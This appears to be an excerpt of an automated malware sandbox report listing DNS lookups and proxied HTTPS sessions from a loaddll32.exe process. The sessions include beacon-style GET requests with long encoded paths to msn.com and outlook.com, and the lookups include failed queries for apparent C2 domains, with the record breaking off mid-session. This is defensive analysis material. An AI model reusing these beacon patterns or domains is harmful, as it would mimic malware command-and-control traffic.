Oct 12, 2021 00:23:42.152149916 CEST  192.168.2.3  8.8.8.8  0xcc3d    Standard query (0)  outlook.com            A (IP address)  IN (0x0001)
Oct 12, 2021 00:23:42.878056049 CEST  192.168.2.3  8.8.8.8  0xb0e4    Standard query (0)  www.outlook.com        A (IP address)  IN (0x0001)
Oct 12, 2021 00:23:43.037961006 CEST  192.168.2.3  8.8.8.8  0x12e4    Standard query (0)  outlook.office365.com  A (IP address)  IN (0x0001)
Oct 12, 2021 00:23:43.714478016 CEST  192.168.2.3  8.8.8.8  0x77d2    Standard query (0)  outlook.com            A (IP address)  IN (0x0001)
Oct 12, 2021 00:23:44.434165001 CEST  192.168.2.3  8.8.8.8  0x792c    Standard query (0)  www.outlook.com        A (IP address)  IN (0x0001)
Oct 12, 2021 00:23:44.615155935 CEST  192.168.2.3  8.8.8.8  0xb80e    Standard query (0)  outlook.office365.com  A (IP address)  IN (0x0001)
Oct 12, 2021 00:24:03.351385117 CEST  192.168.2.3  8.8.8.8  0xef32    Standard query (0)  areuranel.website      A (IP address)  IN (0x0001)
Oct 12, 2021 00:24:05.052063942 CEST  192.168.2.3  8.8.8.8  0x871d    Standard query (0)  areuranel.website      A (IP address)  IN (0x0001)
Oct 12, 2021 00:24:23.429223061 CEST  192.168.2.3  8.8.8.8  0x51      Standard query (0)  msn.com                A (IP address)  IN (0x0001)
Oct 12, 2021 00:24:23.893990040 CEST  192.168.2.3  8.8.8.8  0xfb10    Standard query (0)  www.msn.com            A (IP address)  IN (0x0001)
Oct 12, 2021 00:24:25.331037045 CEST  192.168.2.3  8.8.8.8  0xd3c5    Standard query (0)  msn.com                A (IP address)  IN (0x0001)
Oct 12, 2021 00:24:25.828843117 CEST  192.168.2.3  8.8.8.8  0xb553    Standard query (0)  www.msn.com            A (IP address)  IN (0x0001)
Oct 12, 2021 00:24:44.160267115 CEST  192.168.2.3  8.8.8.8  0x6bfc    Standard query (0)  breuranel.website      A (IP address)  IN (0x0001)
Oct 12, 2021 00:24:46.356193066 CEST  192.168.2.3  8.8.8.8  0xb5e2    Standard query (0)  breuranel.website      A (IP address)  IN (0x0001)
Oct 12, 2021 00:25:04.193835020 CEST  192.168.2.3  8.8.8.8  0x77e9    Standard query (0)  outlook.com            A (IP address)  IN (0x0001)
Oct 12, 2021 00:25:06.399404049 CEST  192.168.2.3  8.8.8.8  0xc7d3    Standard query (0)  outlook.com            A (IP address)  IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 12, 2021 00:22:57.508589983 CEST | 8.8.8.8 | 192.168.2.3 | 0x6f46 | No error (0) | msn.com | | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:22:58.882258892 CEST | 8.8.8.8 | 192.168.2.3 | 0xcb60 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:00.670943022 CEST | 8.8.8.8 | 192.168.2.3 | 0xfc91 | No error (0) | msn.com | | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:02.021467924 CEST | 8.8.8.8 | 192.168.2.3 | 0x9592 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:04.540153980 CEST | 8.8.8.8 | 192.168.2.3 | 0xf380 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:22.051481009 CEST | 8.8.8.8 | 192.168.2.3 | 0x71b2 | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:23.273200989 CEST | 8.8.8.8 | 192.168.2.3 | 0xc440 | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.171742916 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc3d | No error (0) | outlook.com | | 40.97.161.50 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.171742916 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc3d | No error (0) | outlook.com | | 40.97.156.114 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.171742916 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc3d | No error (0) | outlook.com | | 40.97.160.2 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.171742916 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc3d | No error (0) | outlook.com | | 40.97.128.194 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.171742916 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc3d | No error (0) | outlook.com | | 40.97.164.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.171742916 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc3d | No error (0) | outlook.com | | 40.97.153.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.171742916 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc3d | No error (0) | outlook.com | | 40.97.116.82 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.171742916 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc3d | No error (0) | outlook.com | | 40.97.148.226 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.896547079 CEST | 8.8.8.8 | 192.168.2.3 | 0xb0e4 | No error (0) | www.outlook.com | outlook.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:42.896547079 CEST | 8.8.8.8 | 192.168.2.3 | 0xb0e4 | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:42.896547079 CEST | 8.8.8.8 | 192.168.2.3 | 0xb0e4 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:42.896547079 CEST | 8.8.8.8 | 192.168.2.3 | 0xb0e4 | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:42.896547079 CEST | 8.8.8.8 | 192.168.2.3 | 0xb0e4 | No error (0) | HHN-efz.ms-acdc.office.com | | 40.101.60.226 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.896547079 CEST | 8.8.8.8 | 192.168.2.3 | 0xb0e4 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.98.152.242 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.896547079 CEST | 8.8.8.8 | 192.168.2.3 | 0xb0e4 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.162.2 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:42.896547079 CEST | 8.8.8.8 | 192.168.2.3 | 0xb0e4 | No error (0) | HHN-efz.ms-acdc.office.com | | 40.101.61.130 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.057368040 CEST | 8.8.8.8 | 192.168.2.3 | 0x12e4 | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:43.057368040 CEST | 8.8.8.8 | 192.168.2.3 | 0x12e4 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:43.057368040 CEST | 8.8.8.8 | 192.168.2.3 | 0x12e4 | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:43.057368040 CEST | 8.8.8.8 | 192.168.2.3 | 0x12e4 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.151.82 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.057368040 CEST | 8.8.8.8 | 192.168.2.3 | 0x12e4 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.212.194 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.057368040 CEST | 8.8.8.8 | 192.168.2.3 | 0x12e4 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.137.242 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.057368040 CEST | 8.8.8.8 | 192.168.2.3 | 0x12e4 | No error (0) | HHN-efz.ms-acdc.office.com | | 40.101.124.210 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.735552073 CEST | 8.8.8.8 | 192.168.2.3 | 0x77d2 | No error (0) | outlook.com | | 40.97.161.50 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.735552073 CEST | 8.8.8.8 | 192.168.2.3 | 0x77d2 | No error (0) | outlook.com | | 40.97.156.114 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.735552073 CEST | 8.8.8.8 | 192.168.2.3 | 0x77d2 | No error (0) | outlook.com | | 40.97.160.2 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.735552073 CEST | 8.8.8.8 | 192.168.2.3 | 0x77d2 | No error (0) | outlook.com | | 40.97.128.194 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.735552073 CEST | 8.8.8.8 | 192.168.2.3 | 0x77d2 | No error (0) | outlook.com | | 40.97.164.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.735552073 CEST | 8.8.8.8 | 192.168.2.3 | 0x77d2 | No error (0) | outlook.com | | 40.97.153.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.735552073 CEST | 8.8.8.8 | 192.168.2.3 | 0x77d2 | No error (0) | outlook.com | | 40.97.116.82 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:43.735552073 CEST | 8.8.8.8 | 192.168.2.3 | 0x77d2 | No error (0) | outlook.com | | 40.97.148.226 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:44.454426050 CEST | 8.8.8.8 | 192.168.2.3 | 0x792c | No error (0) | www.outlook.com | outlook.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:44.454426050 CEST | 8.8.8.8 | 192.168.2.3 | 0x792c | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:44.454426050 CEST | 8.8.8.8 | 192.168.2.3 | 0x792c | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:44.454426050 CEST | 8.8.8.8 | 192.168.2.3 | 0x792c | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:44.454426050 CEST | 8.8.8.8 | 192.168.2.3 | 0x792c | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.151.2 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:44.454426050 CEST | 8.8.8.8 | 192.168.2.3 | 0x792c | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.137.194 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:44.454426050 CEST | 8.8.8.8 | 192.168.2.3 | 0x792c | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.178.34 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:44.454426050 CEST | 8.8.8.8 | 192.168.2.3 | 0x792c | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.137.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:44.635159016 CEST | 8.8.8.8 | 192.168.2.3 | 0xb80e | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:44.635159016 CEST | 8.8.8.8 | 192.168.2.3 | 0xb80e | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:44.635159016 CEST | 8.8.8.8 | 192.168.2.3 | 0xb80e | No error (0) | outlook.ms-acdc.office.com | FRA-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:23:44.635159016 CEST | 8.8.8.8 | 192.168.2.3 | 0xb80e | No error (0) | FRA-efz.ms-acdc.office.com | | 52.97.151.66 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:44.635159016 CEST | 8.8.8.8 | 192.168.2.3 | 0xb80e | No error (0) | FRA-efz.ms-acdc.office.com | | 52.98.208.50 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:23:44.635159016 CEST | 8.8.8.8 | 192.168.2.3 | 0xb80e | No error (0) | FRA-efz.ms-acdc.office.com | | 52.97.218.66 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:24:03.371390104 CEST | 8.8.8.8 | 192.168.2.3 | 0xef32 | Name error (3) | areuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:24:05.071163893 CEST | 8.8.8.8 | 192.168.2.3 | 0x871d | Name error (3) | areuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:24:23.444994926 CEST | 8.8.8.8 | 192.168.2.3 | 0x51 | No error (0) | msn.com | | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:24:23.913043976 CEST | 8.8.8.8 | 192.168.2.3 | 0xfb10 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:24:25.348794937 CEST | 8.8.8.8 | 192.168.2.3 | 0xd3c5 | No error (0) | msn.com | | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:24:25.849433899 CEST | 8.8.8.8 | 192.168.2.3 | 0xb553 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 00:24:44.179295063 CEST | 8.8.8.8 | 192.168.2.3 | 0x6bfc | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:24:46.375221014 CEST | 8.8.8.8 | 192.168.2.3 | 0xb5e2 | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:04.212004900 CEST | 8.8.8.8 | 192.168.2.3 | 0x77e9 | No error (0) | outlook.com | | 40.97.161.50 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:04.212004900 CEST | 8.8.8.8 | 192.168.2.3 | 0x77e9 | No error (0) | outlook.com | | 40.97.156.114 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:04.212004900 CEST | 8.8.8.8 | 192.168.2.3 | 0x77e9 | No error (0) | outlook.com | | 40.97.160.2 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:04.212004900 CEST | 8.8.8.8 | 192.168.2.3 | 0x77e9 | No error (0) | outlook.com | | 40.97.128.194 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:04.212004900 CEST | 8.8.8.8 | 192.168.2.3 | 0x77e9 | No error (0) | outlook.com | | 40.97.164.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:04.212004900 CEST | 8.8.8.8 | 192.168.2.3 | 0x77e9 | No error (0) | outlook.com | | 40.97.153.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:04.212004900 CEST | 8.8.8.8 | 192.168.2.3 | 0x77e9 | No error (0) | outlook.com | | 40.97.116.82 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:04.212004900 CEST | 8.8.8.8 | 192.168.2.3 | 0x77e9 | No error (0) | outlook.com | | 40.97.148.226 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:06.417855024 CEST | 8.8.8.8 | 192.168.2.3 | 0xc7d3 | No error (0) | outlook.com | | 40.97.128.194 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:06.417855024 CEST | 8.8.8.8 | 192.168.2.3 | 0xc7d3 | No error (0) | outlook.com | | 40.97.164.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:06.417855024 CEST | 8.8.8.8 | 192.168.2.3 | 0xc7d3 | No error (0) | outlook.com | | 40.97.153.146 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:06.417855024 CEST | 8.8.8.8 | 192.168.2.3 | 0xc7d3 | No error (0) | outlook.com | | 40.97.116.82 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:06.417855024 CEST | 8.8.8.8 | 192.168.2.3 | 0xc7d3 | No error (0) | outlook.com | | 40.97.148.226 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:06.417855024 CEST | 8.8.8.8 | 192.168.2.3 | 0xc7d3 | No error (0) | outlook.com | | 40.97.161.50 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:06.417855024 CEST | 8.8.8.8 | 192.168.2.3 | 0xc7d3 | No error (0) | outlook.com | | 40.97.156.114 | A (IP address) | IN (0x0001)
Oct 12, 2021 00:25:06.417855024 CEST | 8.8.8.8 | 192.168.2.3 | 0xc7d3 | No error (0) | outlook.com | | 40.97.160.2 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• msn.com
• outlook.com
• www.outlook.com
• outlook.office365.com

                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.34978213.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:22:58 UTC0OUTGET /mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/2FUMTLKLdgRo4Z6EcuiEOOc/8fsAz5_2Fq/UDZOXONJb9G0Jl7Sh/YwJHU3HBZfrx/Rr2RrnGmK6E/ePg9xCsP_2FGO_/2FHvWeMzr/F7gd5.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: msn.com
                                                                                                                                  2021-10-11 22:22:58 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Location: https://www.msn.com/mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/2FUMTLKLdgRo4Z6EcuiEOOc/8fsAz5_2Fq/UDZOXONJb9G0Jl7Sh/YwJHU3HBZfrx/Rr2RrnGmK6E/ePg9xCsP_2FGO_/2FHvWeMzr/F7gd5.jre
                                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Date: Mon, 11 Oct 2021 22:22:58 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 384
                                                                                                                                  2021-10-11 22:22:58 UTC0INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 72 5f 32 46 64 46 70 6b 52 34 56 64 74 73 4e 30 38 61 2f 5f 32 42 6d 69 52 72 64 6f 2f 69 52 50 56 69 30 74 57 41 53 63 67 35 73 56 47 66 6f 36 36 2f 68 55 46 5f 32 42 44 62 5f 32 42 54 76 73 65 35 76 54 32 2f 4f 47 56 63 34 54 4e 78 49 38 4f 4e 58 4d 6a 7a 50 4a 48 31 6b 6e 2f 69 69 4b 72 79 45 58 32 79 6d 4e 30 54 2f 32 59 58 5f 32 42 73 5f 2f
                                                                                                                                  Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.34978413.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:23:01 UTC1OUTGET /mail/liopolo/C3nZ3ojPKuvLDFaD_2FVNtz/i_2BIT_2FM/PkJe7W3e825Ul_2Ff/m4m7583Exh_2/FXgqIY2YIG4/C7y4oW_2FqnMiT/UXE8adViqK_2F0elSuUWK/zwOfFpRmM9Pcjtlo/mhxUAWIol_2Bidj/ZyUBkmkt9UDUf59heB/_2Fa01_2F/fe5khD18VNL3grTs1oBD/Gp7Xm3KoaUrn2NbkVi4/PAUVXoXppe_2FqPWphraUo/OvKmQ_2F/8LQ.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: msn.com
                                                                                                                                  2021-10-11 22:23:01 UTC1INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Location: https://www.msn.com/mail/liopolo/C3nZ3ojPKuvLDFaD_2FVNtz/i_2BIT_2FM/PkJe7W3e825Ul_2Ff/m4m7583Exh_2/FXgqIY2YIG4/C7y4oW_2FqnMiT/UXE8adViqK_2F0elSuUWK/zwOfFpRmM9Pcjtlo/mhxUAWIol_2Bidj/ZyUBkmkt9UDUf59heB/_2Fa01_2F/fe5khD18VNL3grTs1oBD/Gp7Xm3KoaUrn2NbkVi4/PAUVXoXppe_2FqPWphraUo/OvKmQ_2F/8LQ.jre
                                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:01 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 413
                                                                                                                                  2021-10-11 22:23:01 UTC2INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 43 33 6e 5a 33 6f 6a 50 4b 75 76 4c 44 46 61 44 5f 32 46 56 4e 74 7a 2f 69 5f 32 42 49 54 5f 32 46 4d 2f 50 6b 4a 65 37 57 33 65 38 32 35 55 6c 5f 32 46 66 2f 6d 34 6d 37 35 38 33 45 78 68 5f 32 2f 46 58 67 71 49 59 32 59 49 47 34 2f 43 37 79 34 6f 57 5f 32 46 71 6e 4d 69 54 2f 55 58 45 38 61 64 56 69 71 4b 5f 32 46 30 65 6c 53 75 55 57 4b 2f 7a
                                                                                                                                  Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/C3nZ3ojPKuvLDFaD_2FVNtz/i_2BIT_2FM/PkJe7W3e825Ul_2Ff/m4m7583Exh_2/FXgqIY2YIG4/C7y4oW_2FqnMiT/UXE8adViqK_2F0elSuUWK/z


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.34979340.97.161.50443C:\Windows\System32\loaddll32.exe
                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                                  2021-10-11 22:23:42 UTC | 2 | OUT | GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: outlook.com
                                                                                                                                  2021-10-11 22:23:42 UTC | 3 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Location: https://www.outlook.com/signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: e427b968-c179-19ee-eab5-c69a787deb18
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  X-FEServer: MWHPR11CA0030
                                                                                                                                  X-RequestId: f7bccd31-1fe5-42bc-a78f-bd5067779086
                                                                                                                                  MS-CV: aLkn5HnB7hnqtcaaeH3rGA.0
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: MWHPR11CA0030
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:42 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 0


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                  3 | 192.168.2.3 | 49794 | 40.101.60.226 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                                  2021-10-11 22:23:42 UTC | 3 | OUT | GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: www.outlook.com
                                                                                                                                  2021-10-11 22:23:43 UTC | 4 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Location: https://outlook.office365.com/signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: 3ee32a65-f321-e918-2e40-dbfe04406261
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  X-FEServer: AM5P194CA0018
                                                                                                                                  X-RequestId: 92a6e5ca-1271-47f5-a128-c722311c932a
                                                                                                                                  MS-CV: ZSrjPiHzGOkuQNv+BEBiYQ.0
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: AM5P194CA0018
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:42 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 0


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                  4 | 192.168.2.3 | 49795 | 52.97.151.82 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
